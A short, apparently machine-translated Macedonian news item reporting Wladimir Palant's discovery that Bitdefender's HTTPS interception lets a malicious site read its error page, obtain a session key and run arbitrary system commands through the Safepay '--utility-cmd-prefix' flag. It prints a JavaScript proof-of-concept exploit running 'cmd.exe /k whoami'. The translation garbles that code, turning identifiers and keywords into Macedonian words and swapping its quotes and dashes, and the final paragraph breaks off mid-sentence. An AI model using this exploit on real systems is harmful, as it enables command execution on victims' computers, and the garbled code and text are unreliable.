Владимир Палант, креатор на Adblock Plus,
Причината за проблемот е што антивирусот Bitdefender врши локално пресретнување на сообраќајот HTTPS со замена на оригиналниот TLS сертификат на страницата. Дополнителен root сертификат е инсталиран на системот на клиентот, што овозможува да се скрие работата на користениот систем за сообраќајна инспекција. Антивирусот се вметнува во заштитениот сообраќај и вметнува свој JavaScript код во некои страници за да ја имплементира функцијата Safe Search, а во случај на проблеми со сертификатот за безбедно поврзување, ја заменува вратената страница за грешка со своја. Бидејќи новата страница за грешка се служи во име на серверот што се отвора, другите страници на тој сервер имаат целосен пристап до содржината вметната од Bitdefender.
Кога отворате локација контролирана од напаѓач, таа локација може да испрати XMLHttpRequest и да глуми проблеми со сертификатот HTTPS кога одговара, што ќе доведе до враќање на страница со грешка измислена од Bitdefender. Бидејќи страницата за грешка е отворена во контекст на доменот на напаѓачот, тој може да ја чита содржината на лажната страница со параметрите на Bitdefender. Страницата обезбедена од Bitdefender, исто така, содржи клуч за сесија што ви овозможува да го користите внатрешниот Bitdefender API за да започнете посебна сесија на прелистувачот Safepay, наведувајќи произволни знаменца на командната линија и да стартувате какви било системски команди користејќи го „--utility-cmd-prefix“ знаме. Пример за експлоатација (param1 и param2 се вредности добиени од страницата за грешка):
var барање = ново XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send("data:text/html,nada —utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
Да потсетиме дека една студија спроведена во 2017 г
Само 11 од 26-те производи обезбедија тековни пакети со шифри. 5 системи не ги потврдија сертификатите (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Производите на Kaspersky Internet Security и Total Security беа предмет на напади
Извор: opennet.ru